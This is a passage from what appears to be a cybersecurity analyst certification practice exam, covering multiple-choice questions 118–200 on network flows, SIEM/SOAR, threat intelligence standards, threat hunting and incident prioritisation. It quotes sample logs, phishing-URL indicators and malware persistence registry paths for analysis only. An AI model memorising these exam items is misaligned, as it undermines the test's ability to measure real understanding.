    1. Anomalous behavior
    2. Heuristic behavior
    3. Entity behavior
    4. Known-good behavior
  118. While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
    Date flow start          Duration   Proto  Src IP Addr:Port->Dst IP Addr:Port  Packets  Bytes  Flows
    2019-07-11 13:06:46.343  21601804   TCP    10.1.1.1:1151->10.2.2.3:443          9473640  9.1 G  1
    2019-07-11 13:06:46.551  21601804   TCP    10.2.2.3:443->10.1.1.1:1151          8345101  514 M  1
    1. A web browsing session
    2. Data exfiltration
    3. Data infiltration
    4. A vulnerability scan
  119. How does data enrichment differ from threat feed combination?
    1. Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third-party data to focus on core data elements rather than adding together multiple data sources.
    2. Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
    3. Threat feed combination is more useful than data enrichment because of its focus on only the threats.
    4. Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
  120. Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?
    1. Route poisoning
    2. Antimalware router filters
    3. Subdomain whitelisting
    4. DNS blackholing
  121. Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?
    Schematic illustration of a network to prevent workstation from attacking one another.

    1. An IPS
    2. An IDS
    3. A HIPS
    4. A HIDS
  122. Attackers have been attempting to log in to Alaina's Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?
    1. Prevent console login via SSH
    2. Implement a login-block feature with back-off settings
    3. Move the administrative interface to a protected network
    4. Disable console access entirely
  123. The NetFlow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?
    1. Enable QoS
    2. Enable NetFlow compression
    3. Enable sampling
    4. None of the above
  124. Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, which are becoming more prevalent, and which are decreasing in occurrence. What type of analysis can she perform using this information?
    1. Anomaly
    2. Trend
    3. Heuristic
    4. Availability
  125. Which of the following capabilities is not a typical part of a SIEM system?
    1. Alerting
    2. Performance management
    3. Data aggregation
    4. Log retention
  126. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
    1. Use sha1sum to generate a hash for the file and write a script to check it periodically
    2. Install and use Tripwire
    3. Periodically check the MAC information for the file using a script
    4. Encrypt the file and keep the key secret so the file cannot be modified
  127. Maria wants to deploy an antimalware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?
    1. Signature-based
    2. Heuristic-based
    3. Trend-based
    4. Availability-based
  128. Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
    1. Anomalies in privileged account usage
    2. Time-based login information
    3. A mobile device profile change
    4. DNS request anomalies
  129. Miguel works for a company that has a network security standard requiring the collection and storage of NetFlow logs from all datacenter networks. Miguel is working to commission a new datacenter network but, due to technical constraints, will be unable to collect NetFlow logs for the first six months of operation. Which one of the following data sources is best suited to serve as a compensating control for the lack of NetFlow information?
    1. Router logs
    2. Firewall logs
    3. Switch logs
    4. IPS logs
  130. Megan wants to check memory utilization on a Macintosh system. What Apple tool can she use to do this?
    1. Activity Monitor
    2. MemControl
    3. Run memstat from the command line
    4. Run memctl from the command line
  131. Which one of the following components is not normally part of an endpoint security suite?
    1. IPS
    2. Firewall
    3. Antimalware
    4. VPN
  132. Joan is working as a security consultant to a company that runs a critical web application. She discovered that the application has a serious SQL injection vulnerability but the company cannot take the system offline during the two weeks required to revise the code. Which one of the following technologies would serve as the best compensating control?
    1. IPS
    2. WAF
    3. Vulnerability scanning
    4. Encryption

    Questions 133–136 refer to the following scenario and image.

    Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries:

    Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2: RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22
    Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session opened for user ec2-user by (uid=0)
    Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-user ; USER=root; COMMAND=/bin/bash
     
  133. What is the IP address of the system where the user was logged in when they initiated the connection?
    1. 172.30.0.62
    2. 62.0.30.172
    3. 10.174.238.88
    4. 9.48.6.0
  134. What service did the user use to connect to the server?
    1. HTTPS
    2. PTS
    3. SSH
    4. Telnet
  135. What authentication technique did the user use to connect to the server?
    1. Password
    2. PKI
    3. Token
    4. Biometric
  136. What account did the individual use to connect to the server?
    1. root
    2. ec2-user
    3. bash
    4. pam_unix
  137. Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?
    1. A firewall
    2. A NetFlow collector
    3. A honeypot
    4. A BGP monitor
  138. Fred believes that the malware he is tracking uses a fast flux network and multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?
    Date flow start    Duration Proto    Src IP Addr:Port    Dst IP Addr:Port  Packets Bytes   Flows 
    2019-07-11 14:39:30.606 0.448    TCP      192.168.2.1:1451->10.2.3.1:443     10      1510    1
    2019-07-11 14:39:30.826 0.448    TCP      10.2.3.1:443->192.168.2.1:1451     7       360     1
    2019-07-11 14:45:32.495 18.492   TCP      10.6.2.4:443->192.168.2.1:1496    5     1107    1
    2019-07-11 14:45:32.255 18.888   TCP      192.168.2.1:1496->10.6.2.4:443    11  1840    1
    2019-07-11 14:46:54.983 0.000    TCP      192.168.2.1:1496->10.6.2.4:443     1       49      1
    2008-12-09 16:45:34.764 0.362    TCP      10.6.2.4:443->192.168.2.1:4292      4       1392    1
    2008-12-09 16:45:37.516 0.676    TCP      192.168.2.1:4292->10.6.2.4:443     4       462     1
    2008-12-09 16:46:38.028 0.000    TCP      192.168.2.1:4292->10.6.2.4:443     2       89      1
    2019-07-11 14:45:23.811 0.454    TCP      192.168.2.1:1515->10.6.2.5:443     4       263     1
    2019-07-11 14:45:28.879 1.638    TCP      192.168.2.1:1505->10.6.2.5:443    18      2932    1
    2019-07-11 14:45:29.087 2.288    TCP      10.6.2.5:443->192.168.2.1:1505    37    48125   1
    2019-07-11 14:45:54.027 0.224    TCP      10.6.2.5:443->192.168.2.1:1515     2      1256    1
    2019-07-11 14:45:58.551 4.328    TCP      192.168.2.1:1525->10.6.2.5:443    10      648     1
    2019-07-11 14:45:58.759 0.920    TCP      10.6.2.5:443->192.168.2.1:1525   12     15792   1
    2019-07-11 14:46:32.227 14.796   TCP      192.168.2.1:1525->10.8.2.5:443    31      1700    1
    2019-07-11 14:46:52.983 0.000    TCP      192.168.2.1:1505->10.8.2.5:443     1       40      1
    1. 1
    2. 3
    3. 4
    4. 5
  139. Fiona is considering a scenario in which components that her organization uses in their software that come from public GitHub repositories are trojaned. What should she do first to form the basis of her proactive threat hunting effort?
    1. Search for examples of a similar scenario
    2. Validate the software currently in use from the repositories
    3. Form a hypothesis
    4. Analyze the tools available for this type of attack
  140. Jason is profiling a threat actor using STIX 2.0 and can choose among the following labels.
    • Individual
    • Club
    • Contest
    • Team
    • Organization
    • Government

    What is he identifying?

    1. Affiliation
    2. Attack resource level
    3. Certification level
    4. Threat name
  141. Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
    1. DKIM
    2. An awareness campaign
    3. Blocking all email from unknown senders
    4. SPF
  142. Micah wants to use the data he has collected to help with his threat hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
    1. Hypothesis-driven investigation
    2. Investigation based on indicators of compromise
    3. Investigation based on indications of attack
    4. AI/ML-based investigation
  143. Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?
    1. Whether the malware may change behavior
    2. Whether the host IP or subnet may become a target for further attacks
    3. Attacks may be staged by the malware against other hosts
    4. All of the above
  144. After conducting an nmap scan of his network from outside of his network, James notes that a large number of devices are showing three TCP ports open on public IP addresses: 9100, 515, and 631. What type of devices has he found, and how could he reduce his organization's attack surface?
    1. Wireless access points, disable remote administration
    2. Desktop workstations, enable the host firewall
    3. Printers, move the printers to an internal only IP range
    4. Network switches, enable encrypted administration mode
  145. As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
    1. To increase complexity of analysis
    2. To leverage similarity of threat profiles
    3. To mix sensitivity levels
    4. To provide a consistent baseline for threats
  146. Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mismatched ports for application traffic are all examples of what?
    1. Threat hunting
    2. SCAP
    3. Indicators of compromise
    4. Continuous threat feeds
  147. Alex is working to understand his organization's attack surface. Services, input fields in a web application, and communication protocols are all examples of what component of an attack surface evaluation?
    1. Threats
    2. Attack vectors
    3. Risks
    4. Surface tension
  148. Jiang wants to combine TAXII feeds with his own threat analysis information. What standard can he use to ensure that his data works across multiple systems without needing to be converted?
    1. SAML
    2. XHTML
    3. STIX
    4. YELLOW
  149. Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?
    1. IDS
    2. UEBA
    3. SOAR
    4. SIEM
  150. Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?
    1. Subject lines
    2. Email sender addresses
    3. Attachments
    4. All of the above
  151. Isaac wants to write a script to query the BotScout forum bot blacklisting service. What data should he use to query the service based on the following image?
    Snapshot of BotScout forum bot blacklisting service.
    1. Email address
    2. Name
    3. IP address
    4. Date
  152. Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
    1. IOCs
    2. Methods of data ingestion
    3. SCAP connections
    4. Attack vectors
  153. Talos provides the BASS automated signature synthesizer tool due to modern challenges with malware. What major problem drives increasing use of automated malware signature creation tools?
    1. More complex malware
    2. Huge numbers of new malware signatures
    3. Hash-based signatures take too long to create manually
    4. Sandboxing is no longer effective
  154. Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?
    1. Data drift
    2. Threat collection
    3. Threat centralization
    4. Data enrichment
  155. When a DLP system is monitoring copy/paste, data displayed on a screen or captured from the screen, printing, and similar activities, what term describes the data's state?
    1. Data at rest
    2. Data in motion
    3. Data in use
    4. Data execution
  156. Mila is reviewing feed data from the MISP open source threat intelligence tool and sees the following entry:
    "Unit 42 has discovered a new malware family we've named
    "Reaver" with ties to attackers who use SunOrcal malware. 
    SunOrcal activity has been documented to at least 2013, and 
    based on metadata surrounding some of the C2s, may have been 
    active as early as 2010. The new family appears to have been in 
    the wild since late 2016 and to date we have only identified 10 
    unique samples, indicating it may be sparingly used. Reaver is 
    also somewhat unique in the fact that its final payload is in 
    the form of a Control panel item, or CPL file. To date, only 
    0.006% of all malware seen by Palo Alto Networks employs this 
    technique, indicating that it is in fact fairly rare.", "Tag": 
    [{"colour": "#00223b", "exportable": true, "name": 
    "osint:source-type="blog-post""}], "disable_correlation": 
    false, "object_relation": null, "type": "comment"}, {"comment": 
    "", "category": "Persistence mechanism", "uuid": "5a0a9d47-1c7c-4353-8523-440b950d210f", "timestamp": "1510922426", 
    "to_ids": false, "value": "%COMMONPROGRAMFILES%\services\", 
    "disable_correlation": false, "object_relation": null, "type": 
    "regkey"}, {"comment": "", "category": "Persistence mechanism", 
    "uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp": 
    "1510922426", "to_ids": false, "value": 
    "%APPDATA%\microsoft\mmc\", "disable_correlation": false, 
    "object_relation": null, "type": "regkey"}, {"comment": "", 
    "category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-
    4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids": 
    false, "value": 
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\
    Shell Folders\Common Startup"

    How does the Reaver malware maintain persistence?

    1. A blog post
    2. Inserts itself into the Registry
    3. Installs itself as a runonce key
    4. Requests user permission to start up
  157. Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
    1. Signature-based analysis
    2. A Babbage machine
    3. Machine learning
    4. Artificial network analysis
  158. What is the advantage of a SOAR system over a traditional SIEM system?
    1. SOAR systems are less complex to manage.
    2. SOAR systems handle large log volumes better using machine learning.
    3. SOAR systems integrate a wider range of internal and external systems.
    4. SOAR logs are transmitted only over secure protocols.
  159. What protocol does the U.S. government use to represent the data stored in the National Vulnerability Database?
    1. STIX
    2. CVSS
    3. SCAP
    4. CPE
  160. Brian is on the development team that his company has tasked with maintaining their organization's web application. He and his coworkers check code in multiple times a day, and the code is then verified and tested automatically. What is this practice called?
    1. Continuous delivery
    2. Repo-stuffing
    3. Continuous integration
    4. Time coding
  161. Fiona has continued her threat hunting efforts, and has formed a number of hypotheses. What key issue should she consider when she reviews them?
    1. The number of hypotheses
    2. Her own natural biases
    3. Whether they are strategic or operational
    4. If the attackers know about them
  162. Mila is categorizing an actor using STIX 2.0 and wants to describe an actor that is responsible for APT-level attacks. What STIX threat actor sophistication level best fits this type of actor?
    1. Intermediate
    2. Advanced
    3. Expert
    4. Strategic
  163. Christina wants to describe a threat actor's motivations, abilities, capabilities, and responses. What open standard markup language can she use to do this?
    1. TAXII
    2. OAuth
    3. STIX
    4. STONES
  164. Alaina adds the openphish URL list to her SOAR tool and sees the following entries:
    http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/success.htm
    http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/sitekey.php
    http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/success.htm
    http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/
    http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/
    http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/sitekey.php 

    What action should she take based on phishing URLs like these?

    1. Block the IP address at her border firewall
    2. Monitor for the IP address using her IDS
    3. Delete emails with the URL from inbound email
    4. Nothing, as these have not been confirmed
  165. Rowan wants to block drive-by downloads and bot command and control channels while redirecting potentially impacted systems to a warning message. What should she implement to do this?
    1. A DNS sinkhole
    2. A WAF
    3. An IDS
    4. A UEBA
  166. What type of malware technique hides its command and control servers within a large number of possible suspects?
    1. Polymorphic domain malware
    2. Domain generation algorithms
    3. Hostname multipliers
    4. ICA spoofers
  167. Alex configured a Snort rule that reads:
    alert tcp any any -> any 22 (msg:"Detected!"; sid:10000004;)

    What will Alex's rule typically detect?

    1. FTP traffic
    2. Telnet traffic
    3. SMTP traffic
    4. SSH traffic
  168. Michelle wants to implement a static analysis security testing (SAST) tool into her continuous integration pipeline. What challenge could she run into if her organization uses multiple programming languages for components of their application stack that will be tested?
    1. They will have to ensure the scanner works with all of the languages chosen.
    2. They will have to compile all of the code to the same binary output language.
    3. They will have to run the applications in a sandbox.
    4. They will have to run the applications under the same execution environment.
  169. Nina configures her IPS to detect and stop attacks based on signatures. What type of attacks will she block?
    1. New attacks based on behavior
    2. Previously documented attacks that match the signatures
    3. Previously documented attacks and similar attacks based on the signatures
    4. All of the above
  170. Nathan wants to determine which systems are sending the most traffic on his network. What low overhead data gathering methodology can he use to view traffic sources, destinations, and quantities?
    1. A network sniffer to view all traffic
    2. Implement NetFlow
    3. Implement SDWAN
    4. Implement a network tap

    Use the following table and rating information for questions 171–173.

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) uses a 1–100 scale for incident prioritization, with weight assigned to each of a number of categories. The functional impact score is weighted in their demonstration as follows:

    Functional impact                                  Rating
    No impact                                             0
    No impact to services                                20
    Minimal impact to noncritical services               35
    Minimal impact to critical services                  40
    Significant impact to noncritical services           50
    Denial of noncritical services                       60
    Significant impact to critical services              70
    Denial of critical services or loss of control      100
  171. Nathan discovers a malware package on an end user workstation. What rating should he give this if he is considering organization impact based on the table shown?
    1. No impact
    2. No impact to services
    3. Denial of noncritical services
    4. Denial of critical services or loss of control
  172. Nathan's organization uses a software-as-a-service (SaaS) tool to manage their customer mailing lists, which they use to inform customers of upcoming sales a week in advance. The organization's primary line of business software continues to function and merchandise can be sold. Due to a service outage, they are unable to add new customers to the list for a full business day. How should Nathan rate this local impact issue during the outage?
    1. Minimal impact to noncritical services
    2. Minimal impact to critical services
    3. Significant impact to noncritical services
    4. Denial of noncritical services
  173. During an investigation into a compromised system, Nathan discovers signs of an advanced persistent threat (APT) resident in his organization's administrative systems. How should he classify this threat?
    1. Significant impact to noncritical services
    2. Denial of noncritical services
    3. Significant impact to critical services
    4. Denial of critical services or loss of control
  174. Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?
    Snapshot of the data in the Wireshark protocol hierarchy statistics.
    1. 85.9 percent
    2. 1.7 percent
    3. 20.3 percent
    4. 1.9 percent
  175. Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
    Snapshot of the analysis of reviewing a packet capture including the download of malware.
    1. 172.17.8.8
    2. 49.51.172.56
    3. 172.17.8.172
    4. 56.172.51.49
  176. While reviewing IPS logs, Annie finds the following entry:
    ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)  

    What should her next action be?

    1. Run an antimalware scan of the system associated with the detection
    2. Block inbound traffic from the external system associated with the infection
    3. Block outbound traffic to the external system associated with the infection
    4. Nothing, as this is a false positive due to an expired certificate
  177. Steve uploads a malware sample to an analysis tool and receives the following messages:
    >Executable file was dropped: C:\Logs\mffcae1.exe
    >Child process was created, parent C:\Windows\system32\cmd.exe
    >mffcae1.exe connects to unusual port
    >File downloaded: cx99.exe

    If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?

    1. An antimalware tool
    2. Wireshark
    3. An IPS
    4. Network flows
  178. Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same data center, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., one records the entry at 6 p.m. What issue has Abdul likely encountered?
    1. A malware infection emulating a legitimate process
    2. An incorrect time zone setting
    3. A flaw in the automation script
    4. A log entry error
  179. Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?
    1. Unwitting insiders
    2. Unknown
    3. APT
    4. Hacktivist
  180. Melissa is using the US-CERT's scale to measure the impact of the location of observed activity by a threat actor. Which of the following should be the highest rated threat activity location?
    1. Critical system DMZ
    2. Business network
    3. Business DMZ
    4. Safety systems
  181. Gavin wants to deploy a NAC solution. Which of the following is a validation technique that an agent-based NAC system can use?
    1. Current operating system patch status
    2. Network VLAN or security zone assignment
    3. Antimalware or antivirus update status
    4. All of the above
  182. What information is used to determine which systems can connect to a network port protected by port security?
    1. IP address
    2. Hostname
    3. MAC address
    4. UserID and password
  183. What do DLP systems use to classify data and to ensure that it remains protected?
    1. Data signatures
    2. Business rules
    3. Data egress filters
    4. Data at rest
  184. Jana wants to configure her IPS to block a recently discovered denial-of-service condition that impacts her Apache web server. What is the most effective method of implementing this quickly if her IPS is provided by a commercial vendor?
    1. Research the denial-of-service attack and write a custom detection rule
    2. Block all traffic to the web servers until a patch is installed
    3. Configure a signature-based rule using a signature provided by the vendor
    4. Research the denial-of-service attack, and then use the first released exploit proof of concept to build a signature to detect the attack
  185. Zhi wants to capture network flows from her network as shown in the following image. Where should she collect network flows to balance maximum visibility without collecting unnecessary information?
    Schematic illustration of the flow of network to balance maximum visibility without collecting unnecessary information.
    1. Point A
    2. Point B
    3. Point C
    4. Point D
  186. Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection of indicators of attack based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?
    1. An IPS
    2. An EDR
    3. A CRM
    4. A UEBA
  187. Benita needs to change the permissions on a file named public_secrets.txt stored on a Linux server, and she wants to make the file readable to all users on the system.

    The file is currently set to:

    rwx------

    What command can she use to do this without providing the ability to execute or write to the file?

    1. chmod 777 public_secrets.txt
    2. chmod 744 public_secrets.txt
    3. chmod public_secrets.txt 777
    4. chmod 447 public_secrets.txt
  188. Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
    1. Run the malware on an isolated VM
    2. Perform dynamic analysis of the malware in a sandbox
    3. Perform static analysis of the malware
    4. Run the malware in a container service
  189. Tom wants to improve his detection capabilities for his software-as-a-service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
    1. EDR
    2. CASB
    3. IDS
    4. SIEM
  190. Chuck wants to identify a tool to provision servers, create virtual servers and assign storage to them, and configure networking and security policies. What type of tool should he consider?
    1. Scripting
    2. APIs
    3. Workflow orchestration
    4. SCAP
  191. What advantages does TAXII provide for threat feed combination?
    1. Interoperability between security tools
    2. Confidentiality and integrity of data
    3. Greater speed for sharing of data
    4. All of the above
  192. A production environment with “blue” and “green” deployments in parallel, with one live and one updated to the newest code, is an example of what type of pipeline?
    1. Continuous integration
    2. Waterfall
    3. Spiral
    4. Continuous delivery
  193. Joseph's antimalware package detects new malware by examining code for suspicious properties. What type of technique is this an example of?
    1. Fagan code inspection
    2. Heuristic analysis
    3. Machine learning
    4. Artificial intelligence
  194. Isaac wants to identify known good behavior patterns for all of the applications that his organization uses. If he doesn't want to have a staff member review logs and behaviors for every application in every scenario it is run, what type of analytical tool would best be suited to dealing with this volume and type of data?
    1. Trend analysis
    2. Machine learning
    3. Manual analysis
    4. Endpoint analysis
  195. Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
    1. Set Detect Change
    2. Set Validate File Versions
    3. Set Audit Modifications
    4. None of the above
  196. Naomi wants to analyze URLs found in her passive DNS monitoring logs to find DGA (domain generation algorithm) generated command and control links. What techniques are most likely to be useful for this?
    1. WHOIS lookups and NXDOMAIN queries of suspect URLs
    2. Querying URL whitelists
    3. DNS probes of command-and-control networks
    4. Natural language analysis of domain names
  197. Derek's organization has been working to recover from a recent malware infection that caused outages across the organization during an important part of their business cycle. In order to properly triage, what should Derek pay the most attention to first?
    1. The immediate impact on operations so that his team can restore functionality
    2. The total impact of the event so that his team can provide an accurate final report
    3. The immediate impact on operations so that his team can identify the likely threat actor
    4. The total impact of the event so that his team can build a new threat model for future use
  198. Kathleen wants to ensure that her team of security analysts sees important information about the security status of her organization whenever they log in to the SIEM. What part of a SIEM is designed to provide at-a-glance status information?
    1. The reporting engine
    2. Email reports
    3. The dashboard
    4. The ruleset
  199. Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?
    grep -r "sudo" /home/users/ | grep "bash.log"
    1. All occurrences of the sudo command on the system
    2. All occurrences of root logins by users
    3. All occurrences of the sudo command in bash log files in user home directories
    4. All lines that do not contain the word sudo or bash.log in user directories
  200. Munju wants to test her organization's email for malicious payloads. What type of tool should she select to perform this action?
    1. An antimalware tool
    2. A hashing algorithm
    3. An IPS
    4. A UEBA